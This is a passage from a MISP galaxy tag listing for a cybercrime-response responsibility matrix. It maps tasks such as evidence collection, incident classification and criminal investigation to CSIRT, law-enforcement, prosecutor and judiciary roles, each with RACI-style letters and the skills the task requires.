Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Delivering training - Prosecutors - [S]"

Participating in training - CSIRT - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - CSIRT - [R]"

Participating in training - CSIRT - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - CSIRT - [C]"

Participating in training - CSIRT - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - CSIRT - [I]"

Participating in training - CSIRT - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - CSIRT - [S]"

Participating in training - LEA - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - LEA - [R]"

Participating in training - LEA - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - LEA - [C]"

Participating in training - LEA - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - LEA - [I]"

Participating in training - LEA - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - LEA - [S]"

Participating in training - Judiciary - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Judiciary - [R]"

Participating in training - Judiciary - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Judiciary - [C]"

Participating in training - Judiciary - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Judiciary - [I]"

Participating in training - Judiciary - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Judiciary - [S]"

Participating in training - Prosecutors - [R]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Prosecutors - [R]"

Participating in training - Prosecutors - [C]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Prosecutors - [C]"

Participating in training - Prosecutors - [I]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Prosecutors - [I]"

Participating in training - Prosecutors - [S]

Problem-solving and critical thinking skills

The tag is: misp-galaxy:sod-matrix="Participating in training - Prosecutors - [S]"

Collecting cyber threat intelligence - CSIRT - [R]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - CSIRT - [R]"

Collecting cyber threat intelligence - CSIRT - [C]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - CSIRT - [C]"

Collecting cyber threat intelligence - CSIRT - [I]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - CSIRT - [I]"

Collecting cyber threat intelligence - CSIRT - [S]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - CSIRT - [S]"

Collecting cyber threat intelligence - LEA - [R]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - LEA - [R]"

Collecting cyber threat intelligence - LEA - [C]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - LEA - [C]"

Collecting cyber threat intelligence - LEA - [I]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - LEA - [I]"

Collecting cyber threat intelligence - LEA - [S]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - LEA - [S]"

Collecting cyber threat intelligence - Prosecutors - [R]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - Prosecutors - [R]"

Collecting cyber threat intelligence - Prosecutors - [C]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - Prosecutors - [C]"

Collecting cyber threat intelligence - Prosecutors - [I]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - Prosecutors - [I]"

Collecting cyber threat intelligence - Prosecutors - [S]

Knowledge of cyber threat intelligence landscape

The tag is: misp-galaxy:sod-matrix="Collecting cyber threat intelligence - Prosecutors - [S]"

Analysis of vulnerabilities and threats - CSIRT - [R]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - CSIRT - [R]"

Analysis of vulnerabilities and threats - CSIRT - [C]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - CSIRT - [C]"

Analysis of vulnerabilities and threats - CSIRT - [I]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - CSIRT - [I]"

Analysis of vulnerabilities and threats - CSIRT - [S]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - CSIRT - [S]"

Analysis of vulnerabilities and threats - LEA - [R]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - LEA - [R]"

Analysis of vulnerabilities and threats - LEA - [C]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - LEA - [C]"

Analysis of vulnerabilities and threats - LEA - [I]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - LEA - [I]"

Analysis of vulnerabilities and threats - LEA - [S]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - LEA - [S]"

Analysis of vulnerabilities and threats - Prosecutors - [R]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - Prosecutors - [R]"

Analysis of vulnerabilities and threats - Prosecutors - [C]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - Prosecutors - [C]"

Analysis of vulnerabilities and threats - Prosecutors - [I]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - Prosecutors - [I]"

Analysis of vulnerabilities and threats - Prosecutors - [S]

Development and distribution of tools for preventive and reactive mitigation

The tag is: misp-galaxy:sod-matrix="Analysis of vulnerabilities and threats - Prosecutors - [S]"

Issuing recommendations for new vulnerabilities and threats - CSIRT - [R]

Dealing with specific types of threats and vulnerabilities

The tag is: misp-galaxy:sod-matrix="Issuing recommendations for new vulnerabilities and threats - CSIRT - [R]"

Issuing recommendations for new vulnerabilities and threats - CSIRT - [C]

Dealing with specific types of threats and vulnerabilities

The tag is: misp-galaxy:sod-matrix="Issuing recommendations for new vulnerabilities and threats - CSIRT - [C]"

Issuing recommendations for new vulnerabilities and threats - CSIRT - [I]

Dealing with specific types of threats and vulnerabilities

The tag is: misp-galaxy:sod-matrix="Issuing recommendations for new vulnerabilities and threats - CSIRT - [I]"

Issuing recommendations for new vulnerabilities and threats - CSIRT - [S]

Dealing with specific types of threats and vulnerabilities

The tag is: misp-galaxy:sod-matrix="Issuing recommendations for new vulnerabilities and threats - CSIRT - [S]"

Advising potential victims on preventive measures against cybercrime - CSIRT - [R]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - CSIRT - [R]"

Advising potential victims on preventive measures against cybercrime - CSIRT - [C]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - CSIRT - [C]"

Advising potential victims on preventive measures against cybercrime - CSIRT - [I]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - CSIRT - [I]"

Advising potential victims on preventive measures against cybercrime - CSIRT - [S]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - CSIRT - [S]"

Advising potential victims on preventive measures against cybercrime - LEA - [R]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - LEA - [R]"

Advising potential victims on preventive measures against cybercrime - LEA - [C]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - LEA - [C]"

Advising potential victims on preventive measures against cybercrime - LEA - [I]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - LEA - [I]"

Advising potential victims on preventive measures against cybercrime - LEA - [S]

Raising awareness on preventive measures against cybercrime

The tag is: misp-galaxy:sod-matrix="Advising potential victims on preventive measures against cybercrime - LEA - [S]"

Discovery of the cyber security incident/crime - CSIRT - [R]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - CSIRT - [R]"

Discovery of the cyber security incident/crime - CSIRT - [C]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - CSIRT - [C]"

Discovery of the cyber security incident/crime - CSIRT - [I]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - CSIRT - [I]"

Discovery of the cyber security incident/crime - CSIRT - [S]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - CSIRT - [S]"

Discovery of the cyber security incident/crime - LEA - [R]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - LEA - [R]"

Discovery of the cyber security incident/crime - LEA - [C]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - LEA - [C]"

Discovery of the cyber security incident/crime - LEA - [I]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - LEA - [I]"

Discovery of the cyber security incident/crime - LEA - [S]

Digital investigations; forensics tools; penetration testing; vulnerability scanning; flow analysis

The tag is: misp-galaxy:sod-matrix="Discovery of the cyber security incident/crime - LEA - [S]"

Identification and classification of the cyber security incident/crime - CSIRT - [R]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - CSIRT - [R]"

Identification and classification of the cyber security incident/crime - CSIRT - [C]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - CSIRT - [C]"

Identification and classification of the cyber security incident/crime - CSIRT - [I]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - CSIRT - [I]"

Identification and classification of the cyber security incident/crime - CSIRT - [S]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - CSIRT - [S]"

Identification and classification of the cyber security incident/crime - LEA - [R]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - LEA - [R]"

Identification and classification of the cyber security incident/crime - LEA - [C]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - LEA - [C]"

Identification and classification of the cyber security incident/crime - LEA - [I]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - LEA - [I]"

Identification and classification of the cyber security incident/crime - LEA - [S]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - LEA - [S]"

Identification and classification of the cyber security incident/crime - Prosecutors - [R]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - Prosecutors - [R]"

Identification and classification of the cyber security incident/crime - Prosecutors - [C]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - Prosecutors - [C]"

Identification and classification of the cyber security incident/crime - Prosecutors - [I]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - Prosecutors - [I]"

Identification and classification of the cyber security incident/crime - Prosecutors - [S]

Incident and crime classification and identification

The tag is: misp-galaxy:sod-matrix="Identification and classification of the cyber security incident/crime - Prosecutors - [S]"

Identify the type and severity of the compromise - CSIRT - [R]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - CSIRT - [R]"

Identify the type and severity of the compromise - CSIRT - [C]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - CSIRT - [C]"

Identify the type and severity of the compromise - CSIRT - [I]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - CSIRT - [I]"

Identify the type and severity of the compromise - CSIRT - [S]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - CSIRT - [S]"

Identify the type and severity of the compromise - LEA - [R]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - LEA - [R]"

Identify the type and severity of the compromise - LEA - [C]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - LEA - [C]"

Identify the type and severity of the compromise - LEA - [I]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - LEA - [I]"

Identify the type and severity of the compromise - LEA - [S]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - LEA - [S]"

Identify the type and severity of the compromise - Prosecutors - [R]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - Prosecutors - [R]"

Identify the type and severity of the compromise - Prosecutors - [C]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - Prosecutors - [C]"

Identify the type and severity of the compromise - Prosecutors - [I]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - Prosecutors - [I]"

Identify the type and severity of the compromise - Prosecutors - [S]

Knowledge of cyber threats and incident response procedures

The tag is: misp-galaxy:sod-matrix="Identify the type and severity of the compromise - Prosecutors - [S]"

Evidence collection - CSIRT - [R]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - CSIRT - [R]"

Evidence collection - CSIRT - [C]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - CSIRT - [C]"

Evidence collection - CSIRT - [I]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - CSIRT - [I]"

Evidence collection - CSIRT - [S]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - CSIRT - [S]"

Evidence collection - LEA - [R]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - LEA - [R]"

Evidence collection - LEA - [C]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - LEA - [C]"

Evidence collection - LEA - [I]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - LEA - [I]"

Evidence collection - LEA - [S]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - LEA - [S]"

Evidence collection - Prosecutors - [R]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - Prosecutors - [R]"

Evidence collection - Prosecutors - [C]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - Prosecutors - [C]"

Evidence collection - Prosecutors - [I]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - Prosecutors - [I]"

Evidence collection - Prosecutors - [S]

Knowledge of what kind of data to collect; organisation skills

The tag is: misp-galaxy:sod-matrix="Evidence collection - Prosecutors - [S]"

Providing technical expertise - CSIRT - [R]

Technical skills

The tag is: misp-galaxy:sod-matrix="Providing technical expertise - CSIRT - [R]"

Providing technical expertise - CSIRT - [C]

Technical skills

The tag is: misp-galaxy:sod-matrix="Providing technical expertise - CSIRT - [C]"

Providing technical expertise - CSIRT - [I]

Technical skills

The tag is: misp-galaxy:sod-matrix="Providing technical expertise - CSIRT - [I]"

Providing technical expertise - CSIRT - [S]

Technical skills

The tag is: misp-galaxy:sod-matrix="Providing technical expertise - CSIRT - [S]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [R]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [R]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [C]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [C]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [I]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [I]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [S]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - CSIRT - [S]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [R]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [R]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [C]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [C]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [I]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [I]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [S]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - LEA - [S]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [R]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [R]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [C]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [C]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [I]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [I]"

Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [S]

Digital investigations; forensics tools;

The tag is: misp-galaxy:sod-matrix="Preserving the evidence that may be crucial for the detection of a crime in a criminal trial - Prosecutors - [S]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [R]

Obligations and restriction on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [R]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [C]

Obligations and restriction on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [C]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [I]

Obligations and restriction on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [I]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [S]

Obligations and restriction on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - CSIRT - [S]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [R]

Obligations and restriction on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [R]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [C]

Obligations and restriction on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [C]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [I]

Obligations and restriction on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [I]"

Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [S]

Obligations and restriction on information sharing; communication channels

The tag is: misp-galaxy:sod-matrix="Advising the victim to report / obligation to report a cybercrime to law enforcement (LE) - Prosecutors - [S]"

Duty to inform the victim of a cybercrime - CSIRT - [R]

Obligations and restrictions to the information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - CSIRT - [R]"

Duty to inform the victim of a cybercrime - CSIRT - [C]

Obligations and restrictions to the information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - CSIRT - [C]"

Duty to inform the victim of a cybercrime - CSIRT - [I]

Obligations and restrictions to the information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - CSIRT - [I]"

Duty to inform the victim of a cybercrime - CSIRT - [S]

Obligations and restrictions to the information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - CSIRT - [S]"

Duty to inform the victim of a cybercrime - LEA - [R]

Obligations and restrictions to the information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - LEA - [R]"

Duty to inform the victim of a cybercrime - LEA - [C]

Obligations and restrictions to the information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - LEA - [C]"

Duty to inform the victim of a cybercrime - LEA - [I]

Obligations and restrictions to the information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - LEA - [I]"

Duty to inform the victim of a cybercrime - LEA - [S]

Obligations and restrictions to the information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - LEA - [S]"

Duty to inform the victim of a cybercrime - Prosecutors - [R]

Obligations and restrictions to the information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - Prosecutors - [R]"

Duty to inform the victim of a cybercrime - Prosecutors - [C]

Obligations and restrictions to the information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - Prosecutors - [C]"

Duty to inform the victim of a cybercrime - Prosecutors - [I]

Obligations and restrictions to the information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - Prosecutors - [I]"

Duty to inform the victim of a cybercrime - Prosecutors - [S]

Obligations and restrictions to the information sharing

The tag is: misp-galaxy:sod-matrix="Duty to inform the victim of a cybercrime - Prosecutors - [S]"

Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [R]

Obligations and rules for information sharing among communities

The tag is: misp-galaxy:sod-matrix="Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [R]"

Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [C]

Obligations and rules for information sharing among communities

The tag is: misp-galaxy:sod-matrix="Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [C]"

Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [I]

Obligations and rules for information sharing among communities

The tag is: misp-galaxy:sod-matrix="Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [I]"

Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [S]

Obligations and rules for information sharing among communities

The tag is: misp-galaxy:sod-matrix="Duty to inform other stakeholders/authorities (operators of vulnerable systems, data protection authorities, telecommunications authorities, etc.) - CSIRT - [S]"

Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [R]

Communication skills; communication channel

The tag is: misp-galaxy:sod-matrix="Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [R]"

Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [C]

Communication skills; communication channel

The tag is: misp-galaxy:sod-matrix="Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [C]"

Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [I]

Communication skills; communication channel

The tag is: misp-galaxy:sod-matrix="Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [I]"

Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [S]

Communication skills; communication channel

The tag is: misp-galaxy:sod-matrix="Acting as a single point of contact (PoC) for any communication with other EU Member States for the incident handling - CSIRT - [S]"

Mitigation of an incident - CSIRT - [R]

Well-prepared & well-organised to react promptly in an incident

The tag is: misp-galaxy:sod-matrix="Mitigation of an incident - CSIRT - [R]"

Mitigation of an incident - CSIRT - [C]

Well-prepared & well-organised to react promptly in an incident

The tag is: misp-galaxy:sod-matrix="Mitigation of an incident - CSIRT - [C]"

Mitigation of an incident - CSIRT - [I]

Well-prepared & well-organised to react promptly in an incident

The tag is: misp-galaxy:sod-matrix="Mitigation of an incident - CSIRT - [I]"

Mitigation of an incident - CSIRT - [S]

Well-prepared & well-organised to react promptly in an incident

The tag is: misp-galaxy:sod-matrix="Mitigation of an incident - CSIRT - [S]"

Conducting the criminal investigation - LEA - [R]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - LEA - [R]"

Conducting the criminal investigation - LEA - [C]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - LEA - [C]"

Conducting the criminal investigation - LEA - [I]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - LEA - [I]"

Conducting the criminal investigation - LEA - [S]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - LEA - [S]"

Conducting the criminal investigation - Prosecutors - [R]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - Prosecutors - [R]"

Conducting the criminal investigation - Prosecutors - [C]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - Prosecutors - [C]"

Conducting the criminal investigation - Prosecutors - [I]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - Prosecutors - [I]"

Conducting the criminal investigation - Prosecutors - [S]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="Conducting the criminal investigation - Prosecutors - [S]"

Leading the criminal investigation - Judiciary - [R]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Judiciary - [R]"

Leading the criminal investigation - Judiciary - [C]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Judiciary - [C]"

Leading the criminal investigation - Judiciary - [I]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Judiciary - [I]"

Leading the criminal investigation - Judiciary - [S]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Judiciary - [S]"

Leading the criminal investigation - Prosecutors - [R]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Prosecutors - [R]"

Leading the criminal investigation - Prosecutors - [C]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Prosecutors - [C]"

Leading the criminal investigation - Prosecutors - [I]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Prosecutors - [I]"

Leading the criminal investigation - Prosecutors - [S]

Knowledge of the incident response plan; leadership skills

The tag is: misp-galaxy:sod-matrix="Leading the criminal investigation - Prosecutors - [S]"

In the case of disagreement, the final say for an investigation - Judiciary - [R]

Knowledge of the legal framework; decision- making skills

The tag is: misp-galaxy:sod-matrix="In the case of disagreement, the final say for an investigation - Judiciary - [R]"

In the case of disagreement, the final say for an investigation - Judiciary - [C]

Knowledge of the legal framework; decision- making skills

